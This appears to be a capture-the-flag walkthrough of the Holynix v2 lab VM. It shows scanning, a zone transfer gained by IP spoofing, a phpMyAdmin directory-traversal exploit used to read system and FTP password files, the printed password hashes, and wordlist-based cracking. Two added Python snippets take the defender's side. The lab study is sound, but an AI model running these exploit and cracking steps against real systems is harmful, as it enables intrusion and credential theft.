I have been busy with personal things, but it is time to exploit a box today. This box is the second one in the Holynix series. I have a lot to do today, so OK, let's try to exploit the box.
After scanning the network, the VMware machine is running at IP address 192.168.1.88, so my target is 192.168.1.88.
┌─[[email protected]]─[~]
└──> netdiscover
 Currently scanning: 192.168.19.0/16   |   Screen View: Unique Hosts

 8 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 480
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.1     60:e3:27:be:75:78      1      60  TP-LINK TECHNOLOGIES CO.,LTD
 192.168.1.70    98:fa:e3:48:32:38      1      60  Xiaomi Communications Co Ltd
 192.168.1.75    28:e3:47:86:cd:48      1      60  Liteon Technology Corporatio
 192.168.1.88    00:0c:29:13:21:b3      2     120  VMware, Inc.
 192.168.1.100   34:97:f6:c3:0b:66      2     120  ASUSTek COMPUTER INC.
 192.168.1.105   40:a5:ef:dc:a7:62      1      60  Shenzhen Four Seas Global Li
Nmap again!
┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.88

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 12:01 +0630
Nmap scan report for 192.168.1.88
Host is up (0.00083s latency).
Not shown: 995 filtered ports
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      Pure-FTPd
22/tcp open   ssh      OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
53/tcp open   domain   ISC BIND 9.4.2-P2.1
80/tcp open   http     Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:13:21:B3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
FTP anonymous login does not work. Time to explore port 80 and scan it with dirb.
┌─[[email protected]]─[~]
└──> dirb http://192.168.1.88 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jan  3 12:04:58 2018
URL_BASE: http://192.168.1.88/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.88/ ----
+ http://192.168.1.88/index (CODE:200|SIZE:1205)
+ http://192.168.1.88/index.php (CODE:200|SIZE:1205)
+ http://192.168.1.88/phpMyAdmin (CODE:403|SIZE:330)
+ http://192.168.1.88/register (CODE:200|SIZE:16)
+ http://192.168.1.88/server-status (CODE:403|SIZE:333)

-----------------
END_TIME: Wed Jan  3 12:05:01 2018
DOWNLOADED: 4612 - FOUND: 5
I found one form at index.php. I tried an SQL login bypass to test whether it is vulnerable, and also tried other methods such as file inclusion, XSS and RCE, but they all failed. I also checked phpMyAdmin, but it is forbidden (403).
OK, now I check port 53.
http://192.168.1.88:53/
The domain was restricted. I need to dig the IP address with the domain name zincftp.com.
┌─[[email protected]]─[~]
└──> dig www.zincftp.com @192.168.1.88

; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4896
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.zincftp.com.		IN	A

;; ANSWER SECTION:
www.zincftp.com.	38400	IN	A	192.168.1.88

;; AUTHORITY SECTION:
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	NS	ns1.zincftp.com.

;; ADDITIONAL SECTION:
ns1.zincftp.com.	38400	IN	A	192.168.1.88
ns2.zincftp.com.	38400	IN	A	192.168.1.89

;; Query time: 0 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Wed Jan 03 12:16:05 +0630 2018
;; MSG SIZE  rcvd: 128
I tried a zone transfer, but it failed.
┌─[[email protected]]─[~]
└──> dig www.zincftp.com @192.168.1.88 axfr

; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88 axfr
;; global options: +cmd
; Transfer failed.
OK, now I change my IP address to the one the ns2 record points to (192.168.1.89).
┌─[[email protected]]─[~]
└──> ifconfig eth0 192.168.1.89/24 up
┌─[[email protected]]─[~]
└──> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.89  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::a00:27ff:fee3:4519  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:e3:45:19  txqueuelen 1000  (Ethernet)
        RX packets 193470  bytes 219356737 (209.1 MiB)
        RX errors 0  dropped 443  overruns 0  frame 0
        TX packets 339452  bytes 28046011 (26.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
Dig again!
┌─[[email protected]]─[~]
└──> dig zincftp.com @192.168.1.88 axfr

; <<>> DiG 9.10.6-Debian <<>> zincftp.com @192.168.1.88 axfr
;; global options: +cmd
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.		38400	IN	NS	ns1.zincftp.com.
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	MX	10 mta.zincftp.com.
zincftp.com.		38400	IN	A	192.168.1.88
ahuxley.zincftp.com.	38400	IN	A	192.168.1.88
amckinley.zincftp.com.	38400	IN	A	192.168.1.88
bzimmerman.zincftp.com.	38400	IN	A	192.168.1.88
cbergey.zincftp.com.	38400	IN	A	192.168.1.88
cfinnerly.zincftp.com.	38400	IN	A	192.168.1.88
cjalong.zincftp.com.	38400	IN	A	192.168.1.88
cmahong.zincftp.com.	38400	IN	A	192.168.1.88
cmanson.zincftp.com.	38400	IN	A	192.168.1.88
ddonnovan.zincftp.com.	38400	IN	A	192.168.1.88
ddypsky.zincftp.com.	38400	IN	A	192.168.1.88
dev.zincftp.com.	38400	IN	A	192.168.1.88
dhammond.zincftp.com.	38400	IN	A	192.168.1.88
dmoran.zincftp.com.	38400	IN	A	192.168.1.88
dsummers.zincftp.com.	38400	IN	A	192.168.1.88
evorhees.zincftp.com.	38400	IN	A	192.168.1.88
gwelch.zincftp.com.	38400	IN	A	192.168.1.88
hmcknight.zincftp.com.	38400	IN	A	192.168.1.88
jgacy.zincftp.com.	38400	IN	A	192.168.1.88
jsmith.zincftp.com.	38400	IN	A	192.168.1.88
jstreet.zincftp.com.	38400	IN	A	192.168.1.88
kmccallum.zincftp.com.	38400	IN	A	192.168.1.88
lnickerbacher.zincftp.com.	38400	IN	A	192.168.1.88
lsanderson.zincftp.com.	38400	IN	A	192.168.1.88
lwestre.zincftp.com.	38400	IN	A	192.168.1.88
mta.zincftp.com.	38400	IN	A	10.0.192.48
ncobol.zincftp.com.	38400	IN	A	192.168.1.88
ns1.zincftp.com.	38400	IN	A	192.168.1.88
ns2.zincftp.com.	38400	IN	A	192.168.1.89
rcropper.zincftp.com.	38400	IN	A	192.168.1.88
rfrost.zincftp.com.	38400	IN	A	192.168.1.88
rwoo.zincftp.com.	38400	IN	A	192.168.1.88
skrymple.zincftp.com.	38400	IN	A	192.168.1.88
splath.zincftp.com.	38400	IN	A	192.168.1.88
tmartin.zincftp.com.	38400	IN	A	192.168.1.88
trusted.zincftp.com.	38400	IN	A	192.168.1.34
www.zincftp.com.	38400	IN	A	192.168.1.88
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 0 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Wed Jan 03 12:21:05 +0630 2018
;; XFR size: 42 records (messages 1, bytes 1021)
It works! I try to access phpMyAdmin, but it is still forbidden. The subdomains are also not accessible. :'( OK, let's look for a stranger IP in the same network. More digging...
┌─[✗]─[[email protected]]─[~]
└──> dig zincftp.com @192.168.1.88 axfr | grep -Eiv "192.168.1.88"
;; global options: +cmd
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.		38400	IN	NS	ns1.zincftp.com.
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	MX	10 mta.zincftp.com.
mta.zincftp.com.	38400	IN	A	10.0.192.48
ns2.zincftp.com.	38400	IN	A	192.168.1.89
trusted.zincftp.com.	38400	IN	A	192.168.1.34
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 0 msec
;; WHEN: Wed Jan 03 12:25:09 +0630 2018
;; XFR size: 42 records (messages 1, bytes 1021)
Notice that one subdomain, trusted.zincftp.com, points to 192.168.1.34. OK, try changing my IP address to that one.
┌─[[email protected]]─[~]
└──> ifconfig eth0 192.168.1.34/24 up
Yeah! Now I can access phpMyAdmin.
I tried to write a file with an SQL query (outfile), but only got an error message.
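What the zone transfer above actually gave away is worth pausing on from the defender's side: the AXFR ACL on this server trusts a source address, and anyone who can put ns2's or "trusted"'s address on the wire gets the whole host list, including the records that sit off the server. The script below is an added example (not part of the original post or the Holynix VM): it parses `dig ... axfr` output in the same shape as the transfer shown above, using a constructed, trimmed sample, and pulls out the two things worth auditing in a leaked zone, the name-server addresses the ACL is keyed on and the hosts that resolve somewhere other than the server itself.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of `dig zincftp.com @ns axfr` output, trimmed to a few
# records in the same shape as the transfer on this page (not the real zone file).
SAMPLE_AXFR = """\
zincftp.com.            38400   IN      SOA     ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.            38400   IN      NS      ns1.zincftp.com.
zincftp.com.            38400   IN      NS      ns2.zincftp.com.
zincftp.com.            38400   IN      MX      10 mta.zincftp.com.
zincftp.com.            38400   IN      A       192.168.1.88
amckinley.zincftp.com.  38400   IN      A       192.168.1.88
mta.zincftp.com.        38400   IN      A       10.0.192.48
ns1.zincftp.com.        38400   IN      A       192.168.1.88
ns2.zincftp.com.        38400   IN      A       192.168.1.89
trusted.zincftp.com.    38400   IN      A       192.168.1.34
www.zincftp.com.        38400   IN      A       192.168.1.88
;; Query time: 0 msec
"""

# owner (without trailing dot), TTL, class IN, type, rdata
RR_LINE = re.compile(r"^(\S+)\.\s+(\d+)\s+IN\s+(\S+)\s+(.+)$")


def parse_axfr(text):
    """Return (owner, ttl, type, rdata) tuples, skipping dig's ';;' status lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            owner, ttl, rtype, rdata = m.groups()
            records.append((owner, int(ttl), rtype, rdata.strip()))
    return records


def a_records_by_ip(records):
    """Group A-record owners by the address they point at."""
    by_ip = defaultdict(list)
    for owner, _ttl, rtype, rdata in records:
        if rtype == "A":
            by_ip[rdata].append(owner)
    return dict(by_ip)


def off_server_hosts(records, server_ip):
    """Owners whose A record points anywhere other than the server itself.
    These are the records to review first: a secondary NS address and a
    'trusted' host are exactly what an address-based ACL will let through."""
    return sorted(owner for owner, _t, rtype, rdata in records
                  if rtype == "A" and rdata != server_ip)


def out_of_network_hosts(records, network):
    """Owners whose A record lies outside the given CIDR (stale or internal leaks)."""
    net = ipaddress.ip_network(network)
    return sorted(owner for owner, _t, rtype, rdata in records
                  if rtype == "A" and ipaddress.ip_address(rdata) not in net)


def ns_addresses(records):
    """Map each NS hostname in the zone to its A record (None if the zone lacks one)."""
    a_map = {owner: rdata for owner, _t, rtype, rdata in records if rtype == "A"}
    return {rdata.rstrip("."): a_map.get(rdata.rstrip("."))
            for _o, _t, rtype, rdata in records if rtype == "NS"}


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("hosts not on the server:", off_server_hosts(recs, "192.168.1.88"))
    print("hosts outside 192.168.1.0/24:", out_of_network_hosts(recs, "192.168.1.0/24"))
    print("name servers:", ns_addresses(recs))
```

Run against the real transfer (`dig zincftp.com @192.168.1.88 axfr > zone.txt` and read the file into `parse_axfr`) it reproduces the grep step in the post, but generically. The underlying fix on the BIND side is to stop keying `allow-transfer` on source addresses at all and require a TSIG key for secondaries, since the source address is exactly the thing this walkthrough shows being claimed with one `ifconfig`.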
MySQL said:
#1045 - Access denied for user 'phpadmin'@'localhost' (using password: YES)
Now I check the phpMyAdmin version in the ChangeLog file.
---------------------
phpMyAdmin - Changelog
----------------------

$Id: ChangeLog,v 2.1238.2.12 2005/09/15 16:44:29 lem9 Exp $
$Source: /cvsroot/phpmyadmin/phpMyAdmin/ChangeLog,v $

2005-09-15 Marc Delisle <[email protected]>
### 2.6.4-pl1 released
The final phpMyAdmin version is 2.6.4. I search exploit-db for this version number.
┌─[[email protected]]─[~]
└──> searchsploit phpMyAdmin | grep 2.6.4
phpMyAdmin 2.6.4-pl1 - Directory Traversal | exploits/php/webapps/1244.pl
OK. Time to exploit it.
┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd
ATTACK HOST IS: http://192.168.1.88
HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 11:11:51 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 2604
Connection: close
Content-Type: text/html

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:106:115:MySQL Server,,,:/var/lib/mysql:/bin/false
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash
cmahong:x:1005:2002::/home/cmahong:/bin/false
lnickerbacher:x:1006:2002::/home/lnickerbacher:/bin/false
jstreet:x:1007:2002::/home/jstreet:/bin/false
rwoo:x:1008:2002::/home/rwoo:/bin/false
kmccallum:x:1009:2002::/home/kmccallum:/bin/false
cjalong:x:1010:2002::/home/cjalong:/bin/false
jsmith:x:1011:2002::/home/jsmith:/bin/false
dhammond:x:1012:2002::/home/dhammond:/bin/false
hmcknight:x:1013:2002::/home/hmcknight:/bin/false
lwestre:x:1014:2002::/home/lwestre:/bin/false
gwelch:x:1015:2002::/home/gwelch:/bin/false
dmoran:x:1016:2002::/home/dmoran:/bin/false
dsummers:x:1017:2002::/home/dsummers:/bin/false
bzimmerman:x:1018:2002::/home/bzimmerman:/bin/false
ncobol:x:1019:2002::/home/ncobol:/bin/false
ddypsky:x:1020:2002::/home/ddypsky:/bin/false
rcropper:x:1021:2002::/home/rcropper:/bin/false
cbergey:x:1022:2002::/home/cbergey:/bin/false
tmartin:x:1023:2002::/home/tmartin:/bin/false
jgacy:x:1024:2002::/home/jgacy:/bin/false
splath:x:1025:2002::/home/splath:/bin/false
evorhees:x:1026:2002::/home/evorhees:/bin/false
rfrost:x:1027:2002::/home/rfrost:/bin/false
ahuxley:x:1028:2002::/home/ahuxley:/bin/false
webmaster:x:1029:2002::/var/www:/bin/false
cmanson:x:1030:2002::/home/cmanson:/bin/false
vftp:x:1031:2002:Virtual FTP User:/dev/null:/bin/false
It works. I check and there are 5 users that can log in over SSH (they are the ones with /bin/bash as their shell).
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash
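The directory traversal used above (and again further down for the Apache and Pure-FTPd files) is the classic shape: a user-supplied path is concatenated onto a base directory and handed straight to `require`, so `../../../../../etc/passwd` walks out of the web root. The block below is an added example, not code from the original post or from phpMyAdmin; it shows the unsafe join next to a containment check that resolves both sides before comparing, plus the stricter allowlist form that is the right fix for include-style use. The base directory is the one from the PHP error message on this page; the file names are illustrative.

```python
import os

# The vulnerable shape, written as a Python stand-in for the PHP
#   require('./' . $user_controlled_path)
# behind the error message on this page: the path is joined and used as-is.
def unsafe_join(base_dir, user_path):
    return os.path.normpath(os.path.join(base_dir, user_path))


def safe_join(base_dir, user_path):
    """Return the resolved path of user_path inside base_dir, or None if it escapes.

    Both sides go through realpath so '..' segments and symlinks are collapsed
    before the containment check; a lexical check on the raw string would not
    catch a symlink inside base_dir that points at /etc.
    """
    if os.path.isabs(user_path):            # os.path.join would silently drop base_dir
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath of two absolute paths; anything outside base shares only a parent
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def resolve_include(base_dir, name, allowed):
    """Stricter form for include-style use: only names from a fixed allowlist are
    ever resolved, so user input selects among known files instead of naming a path."""
    if name not in allowed:
        return None
    return safe_join(base_dir, name)


if __name__ == "__main__":
    base = "/var/www/htdocs/phpMyAdmin"   # web root from the error message on this page
    for p in ("../../../../../etc/passwd",
              "../../../../..//etc/pure-ftpd/pureftpd.passwd",
              "libraries/grab_globals.lib.php"):
        print(p, "->", unsafe_join(base, p), "|", safe_join(base, p))
```

`normpath` on the unsafe join shows why the five `../` in the post work even though the base is only four directories deep: extra `..` segments are clamped at `/`, so over-counting costs nothing. The safe version returns `None` for both traversal strings and keeps the in-tree file.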
I tried to crack them with hydra using the rockyou.txt wordlist. It took some hours but still failed. Thinking can save time, so I need to think more.
I noticed the full name of each user and tried to generate a wordlist from them. First, extract all the names from /etc/passwd.
lsanderson Lyle Sanderson lylesanderson
cfinnerly Chuck Finnerly chuckfinnerly
ddonnovan David Donnovan daviddonnovan
skrymple Shelly Krymple shellykrymple
amckinley Agustin Mckinley agustinmckinley
Combine them again with the namemash tool.
┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> ./namemash.py name.txt
lsandersonlsanderson
lsanderson.lsanderson
lsandersonl
llsanderson
l.lsanderson
lsanderson
lylesanderson
sandersonlyle
lyle.sanderson
sanderson.lyle
sandersonl
lsanderson
slyle
l.sanderson
s.lyle
lyle
[.....]
[.....]
a.agustinmckinley
agustinmckinley
And combine again with years, counting from 0 up to 2017. I wrote a bash script:
#!/bin/bash
# Append every number from 0 to 2020 to each username in username.txt
while IFS= read -r name; do
    for year in {0..2020}; do
        echo "${name}${year}"
    done
done < username.txt
┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> ./byear.sh > sshpass.txt
┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> cat sshpass.txt | head -n 6
agustin0
agustin1
agustin2
agustin3
agustin4
agustin5
Also not lucky, but I leave it cracking... Let's try another method.
I need to check the web host config file again!
┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../var/log/apache2/access.log
ATTACK HOST IS: http://192.168.1.88
HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:26:46 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 564
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: require(./../../../../../var/log/apache2/access.log) [<a href='function.require'>function.require</a>]: failed to open stream: Permission denied in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br />
<br />
<b>Fatal error</b>: require() [<a href='function.require'>function.require</a>]: Failed opening required './../../../../../var/log/apache2/access.log' (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br />

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/apache2.conf
ATTACK HOST IS: http://192.168.1.88
HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:27:26 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Connection: close
Content-Type: text/html

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at <URL:http://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#<IfModule !mpm_winnt.c>
#<IfModule !mpm_netware.c>
LockFile /var/lock/apache2/accept.lock
#</IfModule>
#</IfModule>

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
Now try to read the site config file.
┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/sites-enabled/000-default
Yes, I found another directory, setup_guides. Check it.
http://www.zincftp.com/setup_guides/todo
Found another interesting file there. So try to read it too!
┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../..//etc/pure-ftpd/pureftpd.passwd
ATTACK HOST IS: http://192.168.1.88
HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:35:06 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 2602
Connection: close
Content-Type: text/html

cmahong:$1$vUW5q3t0$9RZSkReNoWGCaPtL7ixLX0:1031:2002::/home/cmahong/./::::::::::::
lnickerbacher:$1$yiEZKCE0$BOuvM8nrfoNGWAcjPenpa.:1031:2002::/home/lnickerbacher/./::::::::::::
jstreet:$1$sBGmOuB0$TPHx0jBSFjtJu7dJXb4Nw/:1031:2002::/home/jstreet/./::::::::::::
rwoo:$1$VZxDrE30$p7NPDTkxuQhPSsLpi2a1H1:1031:2002::/home/rwoo/./::::::::::::
cfinnerly:$1$dRGyIOy0$OVGBtLHyxFjPg7tmxtvHY/:1031:2002::/home/cfinnerly/./::::::::::::
kmccallum:$1$dijBzwn0$qlGcbcTT0Qyg8wQf4.QiG1:1031:2002::/home/kmccallum/./::::::::::::
cjalong:$1$FVj4if60$BWSIDiE97oTKUs70qOjZx/:1031:2002::/home/cjalong/./::::::::::::
jsmith:$1$yQKaOpR0$UdySwRtPd1upTckQ5/.CM/:1031:2002::/home/jsmith/./::::::::::::
lsanderson:$1$gzIP52U0$cL6XE61yDZD0unvIIkV8l/:1031:2002::/home/lsanderson/./::::::::::::
dhammond:$1$yK9OuzZ0$W7mgvS4SisxP1BwdLsuy1/:1031:2002::/home/dhammond/./::::::::::::
hmcknight:$1$A07SpdB0$hs/m8KyoJyY3gVAhlWDQI/:1031:2002::/home/hmcknight/./::::::::::::
lwestre:$1$.R5Dbl60$n2ajoJce/LnPVCq497sUQ.:1031:2002::/home/lwestre/./::::::::::::
gwelch:$1$/uYT22Y0$njR3vmLQrbnAugwkNLgJ5/:1031:2002::/home/gwelch/./::::::::::::
dmoran:$1$JZrJXdU0$ORe5.yRgQHCQl6h14rEEe.:1031:2002::/home/dmoran/./::::::::::::
dsummers:$1$VXo3pWp0$v0J7NsxRhDy/ufU01P/ch1:1031:2002::/home/dsummers/./::::::::::::
bzimmerman:$1$rQep6B90$ZtnoFZpTEBkNoRCfqJRpe/:1031:2002::/home/bzimmerman/./::::::::::::
amckinley:$1$45Bz0af0$Fsfo.XXcLkVzSaH5bLjzI0:1031:2002::/home/amckinley/./::::::::::::
ncobol:$1$q.xxgp70$645DFncdOFc24n93la5a70:1031:2002::/home/ncobol/./::::::::::::
ddypsky:$1$ccUhlpJ0$PO/WATKUekwaPct4zXeV9.:1031:2002::/home/ddypsky/./::::::::::::
rcropper:$1$Qhw2Vff0$QDvQMEe9CGFwVrvVUPqTz0:1031:2002::/home/rcropper/./::::::::::::
ddonnovan:$1$1z2APl80$uAyYFZLPu/WRkkpegD3Ht.:1031:2002::/home/ddonnovan/./::::::::::::
cbergey:$1$MOwY3Ie0$LcgARpcVk8Hf8n.E7itC40:1031:2002::/home/cbergey/./::::::::::::
tmartin:$1$3jpH7Yk0$2XmRv6acGEkBjmNQeyzUz.:1031:2002::/home/tmartin/./::::::::::::
jgacy:$1$b.0bYDi0$sSMXaRDSZu8YvWVz.wfCo0:1031:2002::/home/jgacy/./::::::::::::
splath:$1$jbdcsaj0$7uaXto3yRZWwDp5VEbJQV/:1031:2002::/home/splath/./::::::::::::
skrymple:$1$zjyNa1C0$x2JA4Tm61q3N0Fq06gXun1:1031:2002::/home/skrymple/./::::::::::::
evorhees:$1$ITHWZZd0$Qhs38Q7QpRTe./Npk25hu/:1031:2002::/home/evorhees/./::::::::::::
rfrost:$1$3Nqexaj0$eJv5nfOYM71jvlTEA1iv..:1031:2002::/home/rfrost/./::::::::::::
ahuxley:$1$ObpCAT60$LTqCcrqMGAgv8YMyva5Sr0:1031:2002::/home/ahuxley/./::::::::::::
cmanson:$1$gMHNCq70$RCOXC8pfElSRvh5BFc5fF0:1031:2002::/home/cmanson/./::::::::::::
webmaster:$1$v2tdHOX0$MnLOX4cXqZYL99QbDDZ/1/:1031:2002::/var/www/./::::::::::::
Got the shadow-style password file; now crack it with john.
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> ./formatshadow.py raw.txt > shadow
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john shadow --wordlist='/root/Desktop/rockyou.txt'
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 31 password hashes with 31 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Remaining 28 password hashes with 28 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 DONE (2018-01-03 14:07) 0g/s 1371p/s 38413c/s 38413C/s 87thebravery87..8570bravo
Session completed
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john shadow --show
cbergey:chatterbox1:521:500:,,,:/home/cbergey:/bin/bash
tmartin:millionaire:522:500:,,,:/home/tmartin:/bin/bash
ahuxley:bravenewworld:528:500:,,,:/home/ahuxley:/bin/bash

3 password hashes cracked, 28 left
After cracking I got 3 passwords, but I know these 3 users don't have SSH login access, so I try FTP login instead. I tried all 3 logins, but just found a password-protected rar file belonging to user tmartin.
┌─[[email protected]]─[~/Desktop/Holy]
└──> ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan  3 14:14 .
drwxr-xr-x 5 root root 4096 Jan  3 14:11 ..
-rw-r--r-- 1 root root 1004 Jan  3 14:14 mystuff.rar
